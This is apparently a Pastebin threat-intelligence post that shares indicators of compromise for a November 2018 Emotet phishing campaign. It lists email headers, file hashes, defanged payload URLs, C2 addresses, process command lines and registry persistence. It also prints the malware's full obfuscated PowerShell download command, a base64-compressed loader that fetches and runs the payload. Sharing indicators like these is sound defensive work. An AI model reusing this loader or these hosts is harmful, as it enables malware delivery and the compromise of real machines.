SHARE
TWEET

#emotet_091118

VRad Nov 9th, 2018 (edited) 596 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #IOC #OptiData #VR #Emotet #Banker #Feodo #W97M #Poweshell
  2.  
  3. https://pastebin.com/THHMs2wg
  4. other_Emotet_IOCs:
  5. https://pastebin.com/KVNyw9Uq
  6. https://pastebin.com/L2nSzNU4
  7. previous contact:
  8. https://pastebin.com/Y6DnbpHv
  9. FAQ:
  10. https://radetskiy.wordpress.com/2018/10/19/ioc_emotet_011018/
  11. https://kc.mcafee.com/corporate/index?page=content&id=KB90108
  12.  
  13. attack_vector
  14. --------------
  15. email attach .doc > macro > powershell > GET > %temp%\*.exe
  16.  
  17. email_headers
  18. --------------
  19. Received: from public-swhrmf-2c.serverdata.net (public-swhrmf-2c.serverdata.net [64.78.61.27])
  20. Received: from public-swhrmf-2c.serverdata.net ([64.78.61.27])
  21. Received: from mail12.intermedia.net (unknown [64.78.61.134])
  22. Date: Fri, 09 Nov 2018 03:44:58 -0300
  23. From: Интернет-магазин С торгом <info@storgom.ua> <auxiliaradmon1@ravisa.com>
  24. To: user0@hq.88.victim.com
  25. Subject: Интернет-магазин С торгом: Order receipt #4553
  26.  
  27. files
  28. --------------
  29. SHA-256 af2b3dd1afe2b337ea192b9443f4368cc8c6e488d9913fe1ac64ac55e9bb49c8
  30. File name   FILE-901171445210110.doc
  31. File size   71.13 KB
  32.  
  33. SHA-256 9ff551c66e520652a8f1e1ea832a1e361b9a4d877acf1c4fb6001366fbc2ef3d
  34. File name   extr
  35. File size   132 KB
  36.  
  37. SHA-256 db04c89d578d8796007591e2f9c5c0b306fdbf13351232bad8c9fa2acd08e050
  38. File name   WCPDll
  39. File size   357.5 KB
  40.  
  41. activity
  42. **************
  43.  
  44. payload_src
  45. --------------
  46. h11p\мягкое-стекло{.} рф/OYRECjhJU    404
  47. h11p\sastudio{.} co/GgGV3mOVlN      200
  48. h11p\priscawrites{.} com/tS6M2ffhC  200
  49. h11p\gbsbrows{.} com/JZLqJd4        200
  50. h11p\evelin{.} ru/fgARtN6g      404
  51.  
  52. netwrk
  53. --------------
  54. 132.148.254.223 gbsbrows{.} com     GET /JZLqJd4    HTTP/1.1    no User Agent  
  55. 187.163.174.149 187.163.174.149:8080    GET /       HTTP/1.1    Mozilla/4.0
  56.  
  57. comp
  58. --------------
  59. powershell.exe  2604    132.148.254.223 80  ESTABLISHED
  60. colorerkey.exe  2656    187.163.174.149 8080    ESTABLISHED
  61.  
  62. proc
  63. --------------
  64. "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
  65. C:\Windows\SysWOW64\CMD.exe CMD c:\wiNdoWS\SySTem32\CMd   /c"SEt   vmN=.( $sHELLId[1]+$sHeLlid[13]+'x') ...
  66. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOwERsHEll      .  (\"{1}{0}{2}\" -f 'I','SET-','tem') (  \"{0}{3}{1}{2}\"-f'vARI','lE',':0SkX','ab' ...
  67. "C:\tmp\862.exe"
  68. "C:\Users\operator\AppData\Local\Microsoft\Windows\colorerkey.exe"
  69.  
  70. *obfuscated download command:
  71. --------------
  72. /c"SEt   vmN=.( $sHELLId[1]+$sHeLlid[13]+'x')( New-oBJEct io.coMpREsSioN.dEFLatEstREAM([iO.MEmorysTREAm] [COnVERt]::FrOMbaSe64sTrINg( 'NZDdasJAEIVfJRcLq1g3VEsoLgGLVlFaBaX2h95kk0l2NdlNk4lrG3z3JrbO5fnOHOYMqaLC12D7RuwhRGcFyF5BTFIFGjmZTn98KhHzkesmohSFsSULTeYuP56+ltHd+J9Za1kZlFhFyjTcnSfz3TBb79LV1XHS/WYARSJsJEUVD4PM06yV89tAuev3zeNkL5cv1wU4Qqo0Kyo3Th42uPKSK8kLVYaBLRTC3zG49Z4HcSwnlG3zVGGHjmmXk7do5vgOvfcGlJNoM/MJ6OMIIct79JP2Wt6jDE5AeWwKCELZIVhKR2mnLd6tsfiuSfMgNjVWpyaIZiqFi+fGaQO7fKGP5gD9RRN6Ubhocg78HAYYyvp8/gU=' ) , [sYstem.io.COMPressIoN.ComPrESSIonMOdE]::DeCOMPress ) ^| % {New-oBJEct  syStem.io.STreAmrEadEr( $_, [SYsTEM.tExT.EnCOdiNg]::aScII)}^| %{ $_.reAdTOeND()}) && pOwERsHEll     .  (\"{1}{0}{2}\" -f 'I','SET-','tem') (  \"{0}{3}{1}{2}\"-f'vARI','lE',':0SkX','ab'  )  (   [tYPE]( \"{0}{1}{2}\"-f 'E','N','VirOnment' ) ) ;   ( ^& (\"{1}{0}{2}\" -f'ARIA','V','blE' ) (  \"{1}{0}\" -f 'X*xT','E')).\"Val`UE\".\"INvo`kECOmM`AND\".(\"{1}{2}{3}{0}\" -f'PT','in','Vok','ESCri'  ).Invoke(  (  (   .('Gi' )  (  \"{0}{1}{2}\" -f 'VArIA','bLE:0S','kx')).\"Val`Ue\"::(  \"{4}{1}{0}{2}{5}{3}\"-f 'E','t','nvIro','eNtVARIAbLE','ge','nM').Invoke(  'VmN',(\"{1}{0}{2}\" -f 'RoCE','P','ss'  )  ) )   )"
  73.  
  74. persist
  75. --------------
  76. HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run              09.11.2018 14:52   
  77. colorerkey  Windows Componentization Platform Servicing API Microsoft Corporation  
  78. c:\users\operator\appdata\local\microsoft\windows\colorerkey.exe    09.11.2018 14:45
  79.  
  80. drop
  81. --------------
  82. C:\tmp\862.exe
  83. C:\Users\operator\AppData\Local\Microsoft\Windows\colorerkey.exe
  84.  
  85. # # #
  86. doc -   https://www.virustotal.com/#/file/af2b3dd1afe2b337ea192b9443f4368cc8c6e488d9913fe1ac64ac55e9bb49c8/details
  87. exe -   https://www.virustotal.com/#/file/9ff551c66e520652a8f1e1ea832a1e361b9a4d877acf1c4fb6001366fbc2ef3d/details
  88.         https://analyze.intezer.com/#/analyses/c028884b-15ca-4bda-abd0-a22d511fe240
  89. exe#2   -   https://www.virustotal.com/#/file/db04c89d578d8796007591e2f9c5c0b306fdbf13351232bad8c9fa2acd08e050/details
  90.         https://analyze.intezer.com/#/analyses/01b66204-33f5-4128-8f0f-11db305a3101
  91. @
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top